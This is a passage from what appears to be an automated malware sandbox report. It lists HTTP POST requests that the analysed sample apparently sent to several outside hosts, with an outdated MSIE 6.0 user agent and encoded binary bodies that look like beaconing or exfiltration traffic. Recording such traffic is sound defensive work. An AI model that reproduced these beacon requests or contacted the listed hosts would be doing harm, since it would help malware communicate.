4d 78 76 56 77 36 76 37 4f 61 6b 72 6b 4e 54 6e 59 51 66 64 30 57 4a 32 61 6e 6c 54 57 53 51 58 79 5a 4a 54 4f 78 67 46 50 45 49 38 75 36 63 6f 78 50 6e 6f 63 35 4d 4e 37 Data Ascii: jqY69qyRqpRNxyvOl+Hu+L8h5AkEENAgoK1Urz8JGnFDOhC6H1dNXLotBv8rQ8ZQIGQM52g0UA/k12JGo3Fab/toi48Eyfm0rSNVub0xFoZwK8P+k5JvMAerEaV50KMTHW1NBTZIEyGgi5pDmAxmYopOUkEHJgsu/VwTRjhOMYeJpXy5BWHh+TVjdjMcBKAqcXUouV9hwwhX8YsuNfIhs7DCleyxpSNUAbxwP1VT0DY0ctGHZI6UQQt5VknbfnL1vMk5kAW7P/Rm8YtvPLBm2jfn+46ESpl8ICFok2rCJO4SHclyetFR/krDO0PhT8BpEuWsgQzDkowjauYiZDMh08V8P5e6gpXASlgSvKpXg/AVUnCOVlJKH6ao7t2PZypJnOMk0iWLOYRSfedJqRg8QMQ8HdIG3+2OpUySLpLrG+s8JiS3xik85ZoKrhIsZTfsWwFDH8BNCETVJdFosEx3suvQR5+ZkgrQErbz8Mx9ckSk3+XVupFhyv75MwtMxvVw6v7OakrkNTnYQfd0WJ2anlTWSQXyZJTOxgFPEI8u6coxPnoc5MN7
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 70 72 6b 46 39 76 65 50 71 70 52 7a 52 37 57 6c 5a 71 79 54 7a 55 44 31 72 57 61 74 44 79 48 70 47 78 73 37 67 6f 38 2b 35 37 32 76 72 54 6b 72 53 51 6a 6b 69 58 7a 33 57 36 30 5a 39 50 35 64 65 64 32 6f 2b 58 30 4d 4b 68 43 5a 50 34 57 74 33 79 34 6d 63 58 50 59 43 37 64 49 56 4f 44 6e 32 2b 4a 35 63 68 46 43 76 4d 79 65 66 45 70 62 33 69 46 37 4c 49 6d 6d 41 6d 32 4f 75 31 64 2f 45 48 72 76 67 62 70 46 7a 71 57 4f 6e 4a 6e 4e 78 36 4c 78 6d 61 6a 5a 37 41 74 2f 35 64 6b 33 52 6e 77 71 6c 56 42 33 76 73 4d 37 55 68 6c 42 6b 39 38 4f 78 42 7a 58 76 36 43 4f 46 37 58 6a 79 67 79 74 61 76 36 62 6b 39 35 4b 47 75 31 35 4b 35 6a 37 30 61 4f 6d 55 4d 6e 70 54 56 50 51 72 6b 67 79 48 4c 55 56 42 4b 6b 78 49 59 68 71 53 63 63 51 74 4e 56 6f 55 32 79 35 46 67 4a 65 56 47 41 47 66 42 46 42 30 42 5a 72 4b 35 62 47 45 75 72 59 4e 46 50 57 7a 50 47 61 43 76 74 4a 48 46 75 71 44 36 71 6f 62 54 59 7a 2f 55 4d 4b 58 30 61 66 33 53 43 46 7a 30 7a 69 30 68 36 4b 46 73 2b 61 51 35 4c 61 6b 65 33 35 41 4d 71 63 74 44 6d 42 73 50 47 53 31 69 6b 5a 41 6a 30 75 4b 37 67 6a 76 49 6c 47 67 51 77 71 4f 53 5a 58 31 6b 55 53 71 64 45 71 75 53 62 63 73 7a 68 75 39 74 35 30 36 42 75 33 4a 6d 76 30 4f 51 74 4d 4f 74 6f 45 78 62 6c 42 64 6b 75 54 72 79 4a 33 6d 43 4f 6d 75 6d 77 6b 61 52 39 75 59 49 58 5a 73 79 6d 4d 76 6c 55 58 4d 6f 54 34 34 6d 30 35 65 47 4a 54 38 4a 69 63 59 48 38 47 61 41 52 49 68 56 6b 49 4f 4c 69 32 39 78 73 39 4e 67 71 51 73 31 46 53 43 2f 55 78 39 42 44 77 5a 50 2f 2f 69 65 4c 77 69 45 62 4c 4e 45 70 31 6e 34 4b 78 43 58 36 46 32 47 39 49 2b 6d 41 36 74 2b 65 30 77 42 44 65 34 4a 47 69 5a 56 31 31 62 4f 45 32 32 54 68 4d 79 5a 59 36 31 48 4a 44 46 6f 6d 44 49 72 43 76 50 32 73 47 44 4b 4f 76 65 72 4c 7a 48 6d 6d 35 72 66 42 39 69 49 4e 76 67 46 47 41 61 41 3d 3d Data Ascii: prkF9vePqpRzR7WlZqyTzUD1rWatDyHpGxs7go8+572vrTkrSQjkiXz3W60Z9P5ded2o+X0MKhCZP4Wt3y4mcXPYC7dIVODn2+J5chFCvMyefEpb3iF7LImmAm2Ou1d/EHrvgbpFzqWOnJnNx6LxmajZ7At/5dk3RnwqlVB3vsM7UhlBk98OxBzXv6COF7Xjygytav6bk95KGu15K5j70aOmUMnpTVPQrkgyHLUVBKkxIYhqSccQtNVoU2y5FgJeVGAGfBFB0BZrK5bGEurYNFPWzPGaCvtJHFuqD6qobTYz/UMKX0af3SCFz0zi0h6KFs+aQ5Lake35AMqctDmBsPGS1ikZAj0uK7gjvIlGgQwqOSZX1kUSqdEquSbcszhu9t506Bu3Jmv0OQtMOtoExblBdkuTryJ3mCOmumwkaR9uYIXZsymMvlUXMoT44m05eGJT8JicYH8GaARIhVkIOLi29xs9NgqQs1FSC/Ux9BDwZP//ieLwiEbLNEp1n4KxCX6F2G9I+mA6t+e0wBDe4JGiZV11bOE22ThMyZY61HJDFomDIrCvP2sGDKOverLzHmm5rfB9iINvgFGAaA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 58 2b 69 73 50 30 69 7a 69 35 53 69 71 43 4f 2b 69 37 37 39 38 72 74 68 74 7a 76 51 64 36 55 54 2f 48 4c 6e 49 63 7a 67 4c 66 32 7a 31 42 4c 61 47 6d 73 34 48 48 50 78 6c 6c 58 31 46 69 2b 77 75 79 73 2b 59 5a 69 39 49 64 52 79 69 68 5a 47 4e 73 6c 6f 44 7a 67 63 7a 58 6f 32 70 47 37 45 79 74 56 50 57 32 67 62 4e 6c 66 39 6f 4d 73 30 55 6b 37 50 77 37 6d 68 4d 75 6e 63 2f 45 4c 44 55 6a 7a 79 48 76 67 43 6b 6d 32 75 49 53 55 76 4b 30 4b 75 65 50 39 34 68 2b 6a 78 39 4b 4a 67 4a 30 56 63 6c 7a 5a 59 32 35 73 2b 2b 6e 62 44 65 46 54 37 79 53 57 77 65 4f 39 47 52 6c 78 31 69 65 7a 65 30 51 70 52 4b 33 66 79 54 2f 6f 53 67 49 34 34 2b 32 6e 48 67 4c 47 44 48 47 6c 38 31 74 68 55 79 31 73 71 71 31 58 58 69 52 6d 49 55 34 4d 34 64 48 43 7a 5a 37 2b 4a 4f 68 46 4d 2f 71 74 50 2f 72 6c 69 58 50 47 63 52 62 61 6c 55 39 30 4b 78 37 66 71 6b 6e 33 32 6a 51 43 41 6b 32 75 6c 37 39 68 76 46 61 56 52 41 4c 64 35 41 32 61 51 6f 45 37 4e 2f 45 44 6a 4c 36 79 68 35 51 54 36 6c 5a 56 47 6d 62 77 4a 76 4e 67 62 59 4f 53 64 2b 68 75 7a 58 69 4f 59 68 69 61 6f 4e 74 72 6c 38 61 33 52 68 49 39 77 4c 4f 33 61 47 33 46 66 79 61 61 70 38 41 77 58 7a 31 6c 50 48 6a 67 61 5a 59 72 74 41 46 39 68 62 6d 50 4a 74 4e 44 72 4e 47 62 70 57 30 43 62 67 52 67 33 2b 67 61 58 6e 42 76 75 74 57 2b 46 79 39 57 42 42 68 30 47 56 42 79 47 77 56 4d 61 30 32 33 4d 78 31 39 55 79 30 57 6f 33 62 78 4e 52 53 65 74 38 63 6a 30 4b 53 4c 69 50 39 44 49 4c 53 31 72 57 39 41 55 64 38 44 76 39 57 72 4b 34 2f 43 63 65 2b 69 4c 76 70 2b 32 64 37 69 67 31 79 57 76 39 45 64 62 6c 43 46 6c 46 77 55 79 50 76 6e 6e 4f 76 6e 45 77 65 66 65 78 46 77 3d Data Ascii: X+isP0izi5SiqCO+i7798rthtzvQd6UT/HLnIczgLf2z1BLaGms4HHPxllX1Fi+wuys+YZi9IdRyihZGNsloDzgczXo2pG7EytVPW2gbNlf9oMs0Uk7Pw7mhMunc/ELDUjzyHvgCkm2uISUvK0KueP94h+jx9KJgJ0VclzZY25s++nbDeFT7ySWweO9GRlx1ieze0QpRK3fyT/oSgI44+2nHgLGDHGl81thUy1sqq1XXiRmIU4M4dHCzZ7+JOhFM/qtP/rliXPGcRbalU90Kx7fqkn32jQCAk2ul79hvFaVRALd5A2aQoE7N/EDjL6yh5QT6lZVGmbwJvNgbYOSd+huzXiOYhiaoNtrl8a3RhI9wLO3aG3Ffyaap8AwXz1lPHjgaZYrtAF9hbmPJtNDrNGbpW0CbgRg3+gaXnBvutW+Fy9WBBh0GVByGwVMa023Mx19Uy0Wo3bxNRSet8cj0KSLiP9DILS1rW9AUd8Dv9WrK4/Cce+iLvp+2d7ig1yWv9EdblCFlFwUyPvnnOvnEwefexFw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 6a 71 59 36 39 71 79 52 71 70 52 4e 78 79 76 4f 6c 2b 48 75 2b 4c 38 68 35 41 6b 45 45 4e 41 67 6f 4b 31 55 72 7a 38 4a 47 6e 46 44 4f 68 43 36 48 31 64 4e 58 4c 6f 74 42 76 38 72 51 38 5a 51 49 47 51 4d 35 32 67 30 55 41 2f 6b 31 32 4a 47 6f 33 46 61 62 2f 74 6f 69 34 38 45 79 66 6d 30 72 53 4e 56 75 62 30 78 46 6f 5a 77 4b 38 50 2b 6b 35 4a 76 4d 41 65 72 45 61 56 35 30 4b 4d 54 48 57 31 4e 42 54 5a 49 45 79 47 67 69 35 70 44 6d 41 78 6d 59 6f 70 4f 55 6b 45 48 4a 67 73 75 2f 56 77 54 52 6a 68 4f 4d 59 65 4a 70 58 79 35 42 57 48 68 2b 54 56 6a 64 6a 4d 63 42 4b 41 71 63 58 55 6f 75 56 39 68 77 77 68 58 38 59 73 75 4e 66 49 68 73 37 44 43 6c 65 79 78 70 53 4e 55 41 62 78 77 50 31 56 54 30 44 59 30 63 74 47 48 5a 49 36 55 51 51 74 35 56 6b 6e 62 66 6e 4c 31 76 4d 6b 35 6b 41 57 37 50 2f 52 6d 38 59 74 76 50 4c 42 6d 32 6a 66 6e 2b 34 36 45 53 70 6c 38 49 43 46 6f 6b 32 72 43 4a 4f 34 53 48 63 6c 79 65 74 46 52 2f 6b 72 44 4f 30 50 68 54 38 42 70 45 75 57 73 67 51 7a 44 6b 6f 77 6a 61 75 59 69 5a 44 4d 68 30 38 56 38 50 35 65 36 67 70 58 41 53 6c 67 53 76 4b 70 58 67 2f 41 56 55 6e 43 4f 56 6c 4a 4b 48 36 61 6f 37 74 32 50 5a 79 70 4a 6e 4f 4d 6b 30 69 57 4c 4f 59 52 53 66 65 64 4a 71 52 67 38 51 4d 51 38 48 64 49 47 33 2b 32 4f 70 55 79 53 4c 70 4c 72 47 2b 73 38 4a 69 53 33 78 69 6b 38 35 5a 6f 4b 72 68 49 73 5a 54 66 73 57 77 46 44 48 38 42 4e 43 45 54 56 4a 64 46 6f 73 45 78 33 73 75 76 51 52 35 2b 5a 6b 67 72 51 45 72 62 7a 38 4d 78 39 63 6b 53 6b 33 2b 58 56 75 70 46 68 79 76 37 35 4d 77 74 4d 78 76 56 77 36 76 37 4f 61 6b 72 6b 4e 54 6e 59 51 66 64 30 57 4a 32 61 6e 6c 54 57 53 51 58 79 5a 4a 54 4f 78 67 46 50 45 49 38 75 36 63 6f 78 50 6e 6f 63 35 4d 4e 37 Data Ascii: jqY69qyRqpRNxyvOl+Hu+L8h5AkEENAgoK1Urz8JGnFDOhC6H1dNXLotBv8rQ8ZQIGQM52g0UA/k12JGo3Fab/toi48Eyfm0rSNVub0xFoZwK8P+k5JvMAerEaV50KMTHW1NBTZIEyGgi5pDmAxmYopOUkEHJgsu/VwTRjhOMYeJpXy5BWHh+TVjdjMcBKAqcXUouV9hwwhX8YsuNfIhs7DCleyxpSNUAbxwP1VT0DY0ctGHZI6UQQt5VknbfnL1vMk5kAW7P/Rm8YtvPLBm2jfn+46ESpl8ICFok2rCJO4SHclyetFR/krDO0PhT8BpEuWsgQzDkowjauYiZDMh08V8P5e6gpXASlgSvKpXg/AVUnCOVlJKH6ao7t2PZypJnOMk0iWLOYRSfedJqRg8QMQ8HdIG3+2OpUySLpLrG+s8JiS3xik85ZoKrhIsZTfsWwFDH8BNCETVJdFosEx3suvQR5+ZkgrQErbz8Mx9ckSk3+XVupFhyv75MwtMxvVw6v7OakrkNTnYQfd0WJ2anlTWSQXyZJTOxgFPEI8u6coxPnoc5MN7
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 30 75 75 51 52 66 7a 55 70 4a 53 48 52 48 54 4e 70 79 78 47 51 6f 39 52 79 39 2b 55 72 65 72 46 38 50 32 68 48 30 2b 67 71 49 51 72 2b 39 61 63 31 58 78 68 74 5a 6f 4a 73 35 42 4c 6a 5a 43 39 76 6f 61 6a 31 56 38 41 2b 54 65 73 62 79 2b 62 39 41 4d 42 34 54 37 62 48 6a 4c 48 34 67 35 52 46 64 67 5a 57 63 7a 39 52 4b 57 70 76 4b 5a 71 49 2b 55 46 62 6e 64 69 58 67 32 78 2b 64 64 79 55 77 35 4a 73 4b 72 4e 51 68 50 5a 67 4a 77 37 53 68 48 39 53 62 6b 58 65 71 6e 65 62 33 58 64 61 49 45 49 56 2b 6f 6d 4e 4e 30 4f 53 77 7a 70 62 48 48 51 36 79 54 48 6a 6a 77 41 52 51 78 37 37 2f 61 49 5a 79 48 31 5a 68 41 45 76 55 55 4b 4a 31 52 72 7a 46 45 44 66 71 69 38 72 7a 75 44 47 4f 78 56 4b 47 59 64 4b 44 4d 36 39 2b 2b 51 6e 56 70 70 57 42 4c 52 6b 2f 37 54 4d 72 57 6c 35 51 4d 59 63 65 50 61 6e 6b 69 51 51 36 39 6d 38 30 71 54 56 2f 47 44 61 38 57 34 6b 77 74 6e 49 34 76 2f 6b 78 4c 4d 6e 64 61 36 6a 42 45 39 33 52 62 75 70 2b 2b 6d 4d 50 46 6e 2b 70 65 32 48 48 53 6a 44 78 58 6a 6b 6a 48 55 61 38 71 68 78 6c 45 64 78 43 79 52 49 75 35 6a 6e 6b 35 55 6f 6e 39 48 6e 6b 68 62 6e 73 30 56 36 32 4f 48 4d 5a 68 67 44 76 45 72 4d 77 2b 4e 32 37 62 2f 44 42 4e 65 7a 31 75 70 4b 56 54 69 35 64 6e 73 6f 6f 50 53 34 45 53 6b 42 68 6a 38 44 33 69 56 66 70 71 6b 6a 46 30 56 38 54 6c 33 53 5a 75 59 62 76 31 7a 49 43 74 71 72 64 4a 78 4d 77 51 30 44 67 58 69 6e 33 4b 42 54 63 62 33 59 30 55 70 52 72 76 56 74 68 2f 4a 48 2b 2f 30 47 46 54 43 4d 45 65 69 32 64 4e 4d 31 4d 48 7a 31 51 6b 50 6c 46 64 47 50 6a 2b 4e 51 36 51 38 6e 62 39 4f 75 70 55 65 67 72 46 59 66 68 4a 57 65 6e 45 4c 45 35 33 64 45 58 71 4f 63 43 48 36 70 63 70 71 7a 56 62 39 4b 5a 4c 5a 34 58 5a 38 33 62 47 6d 75 2b 6d 74 6e 79 77 71 55 73 56 71 4b 5a 6f 78 2f 55 77 33 43 4e 32 57 38 62 59 3d Data Ascii: 0uuQRfzUpJSHRHTNpyxGQo9Ry9+UrerF8P2hH0+gqIQr+9ac1XxhtZoJs5BLjZC9voaj1V8A+Tesby+b9AMB4T7bHjLH4g5RFdgZWcz9RKWpvKZqI+UFbndiXg2x+ddyUw5JsKrNQhPZgJw7ShH9SbkXeqneb3XdaIEIV+omNN0OSwzpbHHQ6yTHjjwARQx77/aIZyH1ZhAEvUUKJ1RrzFEDfqi8rzuDGOxVKGYdKDM69++QnVppWBLRk/7TMrWl5QMYcePankiQQ69m80qTV/GDa8W4kwtnI4v/kxLMnda6jBE93Rbup++mMPFn+pe2HHSjDxXjkjHUa8qhxlEdxCyRIu5jnk5Uon9Hnkhbns0V62OHMZhgDvErMw+N27b/DBNez1upKVTi5dnsooPS4ESkBhj8D3iVfpqkjF0V8Tl3SZuYbv1zICtqrdJxMwQ0DgXin3KBTcb3Y0UpRrvVth/JH+/0GFTCMEei2dNM1MHz1QkPlFdGPj+NQ6Q8nb9OupUegrFYfhJWenELE53dEXqOcCH6pcpqzVb9KZLZ4XZ83bGmu+mtnywqUsVqKZox/Uw3CN2W8bY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 4f 36 63 69 52 42 62 4a 70 4a 54 46 6a 33 65 47 38 65 30 52 46 4c 6e 53 4c 4a 65 32 74 4e 59 6d 71 72 59 6f 58 38 43 6b 54 31 7a 66 49 4a 45 4f 34 51 58 73 63 38 52 79 59 2b 6a 4c 71 52 36 6f 35 64 54 76 4f 6c 53 6d 56 67 69 2f 6e 59 35 50 66 56 56 43 58 74 5a 53 72 71 4d 37 59 57 6a 45 74 41 70 4b 76 6d 4c 5a 6c 46 30 75 55 42 66 6e 78 4b 4e 62 50 50 79 48 4e 71 65 30 52 49 78 44 2f 37 75 2b 62 74 6a 78 61 78 6c 71 33 6a 4f 6c 37 55 37 77 2b 6d 31 77 71 4a 4c 34 64 46 51 79 4d 43 37 32 45 78 62 56 49 4b 61 32 71 55 4e 52 67 6e 54 6e 63 34 52 4e 4e 50 34 39 33 61 47 77 6c 4a 53 62 63 69 50 35 35 31 57 52 34 54 53 56 47 52 31 51 55 2f 44 69 54 69 31 48 37 5a 63 4b 67 43 72 67 6c 37 39 4b 53 78 48 43 41 30 78 63 69 7a 53 59 6e 6f 64 43 5a 72 62 42 75 6b 6d 32 31 38 71 66 2b 51 70 4d 6c 75 30 4d 76 64 7a 35 6e 55 74 54 4c 55 43 68 6c 69 44 6c 71 2b 75 67 76 35 44 67 72 38 79 43 72 4a 42 6c 33 59 6d 6b 73 79 45 72 74 38 79 37 4c 5a 55 64 43 53 37 6c 67 74 43 50 34 6d 61 49 69 56 38 56 67 32 53 31 42 6c 37 42 43 61 37 76 63 78 59 39 63 56 33 76 66 4d 46 77 35 68 46 70 53 42 50 2f 59 64 4b 53 77 46 72 4b 6d 50 39 70 4d 4f 56 54 72 2f 69 53 5a 67 47 6e 54 61 63 39 49 68 52 32 4a 6f 43 4e 31 30 2f 33 76 57 36 57 73 44 52 55 32 46 30 35 70 57 50 79 59 30 68 4b 53 73 56 56 70 6e 67 34 59 4f 64 37 54 74 56 51 6c 48 63 67 6c 70 4b 41 62 71 51 32 4a 4b 65 6b 58 38 33 68 79 51 4f 57 56 31 30 32 6a 51 64 4b 46 76 47 45 35 68 4b 46 6e 79 34 34 77 51 55 6f 6a 39 74 4a 44 79 34 33 70 6b 4c 55 50 42 6b 77 6b 4d 36 76 76 44 77 6b 63 2b 6f 4f 49 42 56 30 78 32 59 52 31 4c 56 6e 44 6d 61 6a 79 33 79 71 69 69 4e 52 6f 54 6a 64 5a 78 68 43 4f 69 44 66 38 54 43 4e 36 4b 79 47 52 33 54 4b 33 52 52 31 57 4d 70 59 69 74 30 70 37 76 5a 6d 55 56 59 35 71 2f 2b 38 Data Ascii: O6ciRBbJpJTFj3eG8e0RFLnSLJe2tNYmqrYoX8CkT1zfIJEO4QXsc8RyY+jLqR6o5dTvOlSmVgi/nY5PfVVCXtZSrqM7YWjEtApKvmLZlF0uUBfnxKNbPPyHNqe0RIxD/7u+btjxaxlq3jOl7U7w+m1wqJL4dFQyMC72ExbVIKa2qUNRgnTnc4RNNP493aGwlJSbciP551WR4TSVGR1QU/DiTi1H7ZcKgCrgl79KSxHCA0xcizSYnodCZrbBukm218qf+QpMlu0Mvdz5nUtTLUChliDlq+ugv5Dgr8yCrJBl3YmksyErt8y7LZUdCS7lgtCP4maIiV8Vg2S1Bl7BCa7vcxY9cV3vfMFw5hFpSBP/YdKSwFrKmP9pMOVTr/iSZgGnTac9IhR2JoCN10/3vW6WsDRU2F05pWPyY0hKSsVVpng4YOd7TtVQlHcglpKAbqQ2JKekX83hyQOWV102jQdKFvGE5hKFny44wQUoj9tJDy43pkLUPBkwkM6vvDwkc+oOIBV0x2YR1LVnDmajy3yqiiNRoTjdZxhCOiDf8TCN6KyGR3TK3RR1WMpYit0p7vZmUVY5q/+8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 6c 4e 56 64 37 58 76 6f 75 70 51 73 5a 2b 4f 70 45 73 4f 51 39 6d 54 55 4a 34 71 42 66 4c 34 50 33 31 6e 41 78 51 67 6e 50 6f 62 32 74 68 43 4e 6e 46 41 30 4a 42 62 42 34 47 4c 38 59 61 6f 4c 48 72 79 49 6a 44 2b 38 4a 6f 54 44 6b 56 64 4e 67 54 47 37 45 42 73 63 53 6d 32 55 4b 50 43 7a 5a 6e 76 4a 69 65 74 64 73 2f 65 74 66 4b 75 6a 38 47 6b 75 71 79 68 79 4b 5a 6f 66 6c 6d 59 47 4a 76 36 51 70 33 6d 52 77 7a 4b 78 6c 2b 78 6c 53 70 65 6d 69 50 43 66 56 4b 2f 72 34 58 33 53 61 48 76 53 2f 6e 6f 42 45 5a 44 58 63 56 4b 44 5a 74 4d 4a 4b 63 41 31 46 6c 70 2b 55 39 74 32 38 38 43 50 5a 67 7a 67 50 6a 52 45 33 70 6b 63 6b 52 42 57 77 39 52 4f 4c 55 47 47 55 44 37 2f 51 58 4b 59 64 75 2b 47 73 67 4a 79 79 30 59 4d 63 52 32 44 66 43 65 44 2f 2b 2f 78 7a 63 71 31 41 32 30 6d 46 35 65 75 34 76 69 30 4c 38 54 4d 45 70 72 69 6c 71 38 51 79 56 34 4b 51 75 72 52 30 4a 4c 34 56 45 52 64 34 59 54 70 49 71 53 65 48 5a 48 77 44 49 55 66 47 32 46 65 30 76 7a 71 6f 79 64 41 66 33 70 70 43 56 35 43 6d 72 36 73 41 2f 44 49 4a 59 48 6d 2f 64 31 51 79 45 50 51 6e 67 68 41 61 51 69 4e 6a 58 41 79 4e 43 75 43 6e 67 45 78 68 78 49 74 71 44 41 56 66 65 4b 69 67 57 77 2b 32 45 74 33 68 39 64 30 51 56 64 6b 63 69 75 34 4d 34 66 44 4c 6c 7a 55 4f 45 38 30 6d 7a 64 6c 79 42 44 58 75 75 58 79 48 33 38 74 61 47 49 67 6d 52 4f 52 38 54 5a 45 30 61 78 73 42 65 35 4d 5a 32 43 4d 77 54 47 6e 46 41 4d 37 30 50 6c 51 44 43 59 38 48 5a 43 6c 5a 4f 67 48 71 63 57 51 6c 36 30 69 39 2b 31 39 4d 34 63 67 79 51 7a 31 6e 4b 4d 2b 47 6e 75 39 45 73 6b 38 6c 7a 6a 69 39 66 59 54 46 67 5a 56 2f 31 7a 50 6b 56 46 75 57 4b 44 2f 55 79 2f 70 48 4e 62 33 45 34 47 41 46 55 6b 66 72 43 56 51 44 41 59 65 63 45 69 79 30 77 69 35 67 6c 79 62 64 59 39 6c 57 2f 79 70 4a 75 73 44 70 47 30 33 73 6b 75 66 Data Ascii: lNVd7XvoupQsZ+OpEsOQ9mTUJ4qBfL4P31nAxQgnPob2thCNnFA0JBbB4GL8YaoLHryIjD+8JoTDkVdNgTG7EBscSm2UKPCzZnvJietds/etfKuj8GkuqyhyKZoflmYGJv6Qp3mRwzKxl+xlSpemiPCfVK/r4X3SaHvS/noBEZDXcVKDZtMJKcA1Flp+U9t288CPZgzgPjRE3pkckRBWw9ROLUGGUD7/QXKYdu+GsgJyy0YMcR2DfCeD/+/xzcq1A20mF5eu4vi0L8TMEprilq8QyV4KQurR0JL4VERd4YTpIqSeHZHwDIUfG2Fe0vzqoydAf3ppCV5Cmr6sA/DIJYHm/d1QyEPQnghAaQiNjXAyNCuCngExhxItqDAVfeKigWw+2Et3h9d0QVdkciu4M4fDLlzUOE80mzdlyBDXuuXyH38taGIgmROR8TZE0axsBe5MZ2CMwTGnFAM70PlQDCY8HZClZOgHqcWQl60i9+19M4cgyQz1nKM+Gnu9Esk8lzji9fYTFgZV/1zPkVFuWKD/Uy/pHNb3E4GAFUkfrCVQDAYecEiy0wi5glybdY9lW/ypJusDpG03skuf
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 47 63 48 31 37 57 7a 74 75 70 51 70 79 77 34 4d 56 77 6b 53 64 48 2b 33 71 55 66 45 4e 71 73 33 59 4f 55 69 6d 52 41 55 6f 32 6e 66 62 33 67 43 6a 73 37 44 47 4e 66 6c 6f 38 45 55 5a 4a 79 6c 48 66 49 72 69 33 71 75 58 41 50 4f 75 6c 70 55 48 50 45 4c 39 38 6c 68 37 63 53 34 72 37 45 50 45 33 64 46 69 61 61 39 36 6a 43 74 6a 2f 58 4f 47 50 4d 75 39 55 41 59 57 31 72 73 6e 4a 49 70 6b 78 39 6b 71 67 6e 77 4a 7a 52 41 46 6a 59 7a 7a 63 69 75 71 77 35 6f 76 69 72 78 4b 76 38 38 44 31 50 61 33 38 58 65 65 77 48 54 73 74 63 61 6c 51 4c 47 67 48 7a 47 35 34 31 53 49 6d 77 6a 58 78 4c 79 6c 48 6b 4a 53 72 34 4a 62 76 65 37 30 65 65 2b 54 66 5a 77 50 68 68 73 75 68 33 58 47 6b 68 33 71 2f 65 45 4a 64 39 54 41 78 52 52 46 47 61 46 34 64 54 2f 6d 45 35 64 65 48 4a 46 57 6f 43 53 6f 48 48 43 30 5a 6c 6e 71 62 36 37 49 58 76 75 37 53 4d 53 4f 62 6e 6a 66 76 47 34 55 31 56 35 77 54 42 73 47 6d 4a 4e 54 2b 69 74 2f 59 72 52 6a 2f 32 4e 47 4d 34 31 4a 31 74 4d 73 7a 76 4b 58 68 46 6f 73 69 54 44 46 48 75 75 63 63 5a 75 65 4a 70 6a 66 64 45 72 2b 44 2b 74 57 44 74 65 35 4f 65 63 35 4d 47 55 49 49 32 48 53 67 63 46 64 48 49 2f 7a 2f 4d 73 74 42 6e 77 4f 71 42 4d 64 66 30 65 6b 6a 6a 58 42 67 5a 39 77 62 48 4c 76 6c 55 42 43 34 61 67 6f 36 65 2f 7a 4e 72 4e 4b 4b 4a 31 38 55 6b 39 34 70 58 55 56 63 70 71 31 31 68 2f 71 6d 46 36 72 45 62 53 4f 49 67 6b 73 2f 62 49 6d 38 34 52 52 58 30 6d 39 43 5a 4c 46 67 52 45 6c 54 46 52 2f 4d 4e 4a 4b 4f 30 6e 35 68 6a 62 78 66 64 4f 49 6f 63 50 2f 79 48 48 47 76 32 46 49 36 72 6c 59 4c 77 63 55 50 2b 37 64 6b 6e 45 6d 33 7a 57 56 33 36 6c 30 79 54 32 31 30 4a 43 5a 62 46 77 47 52 31 45 38 78 4a 49 58 74 7a 6f 46 62 37 6a 73 77 3d 3d Data Ascii: GcH17WztupQpyw4MVwkSdH+3qUfENqs3YOUimRAUo2nfb3gCjs7DGNflo8EUZJylHfIri3quXAPOulpUHPEL98lh7cS4r7EPE3dFiaa96jCtj/XOGPMu9UAYW1rsnJIpkx9kqgnwJzRAFjYzzciuqw5ovirxKv88D1Pa38XeewHTstcalQLGgHzG541SImwjXxLylHkJSr4Jbve70ee+TfZwPhhsuh3XGkh3q/eEJd9TAxRRFGaF4dT/mE5deHJFWoCSoHHC0Zlnqb67IXvu7SMSObnjfvG4U1V5wTBsGmJNT+it/YrRj/2NGM41J1tMszvKXhFosiTDFHuuccZueJpjfdEr+D+tWDte5Oec5MGUII2HSgcFdHI/z/MstBnwOqBMdf0ekjjXBgZ9wbHLvlUBC4ago6e/zNrNKKJ18Uk94pXUVcpq11h/qmF6rEbSOIgks/bIm84RRX0m9CZLFgRElTFR/MNJKO0n5hjbxfdOIocP/yHHGv2FI6rlYLwcUP+7dknEm3zWV36l0yT210JCZbFwGR1E8xJIXtzoFb7jsw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 51 2f 42 46 46 4f 4d 72 76 4a 52 54 47 4f 42 79 61 70 2b 6b 44 41 79 30 39 68 55 4a 43 4d 52 74 78 36 64 7a 62 72 6f 47 74 4a 68 77 52 49 5a 6b 2f 49 6c 2b 45 5a 48 70 6e 64 56 6a 6b 6e 69 6f 72 56 6b 42 39 41 34 65 4b 45 6d 39 49 68 35 67 43 45 48 54 4c 6c 48 49 46 57 71 66 64 65 37 58 62 45 68 69 74 73 51 61 31 46 33 45 68 69 6b 6b 66 6c 69 78 48 35 7a 70 33 4e 4e 51 38 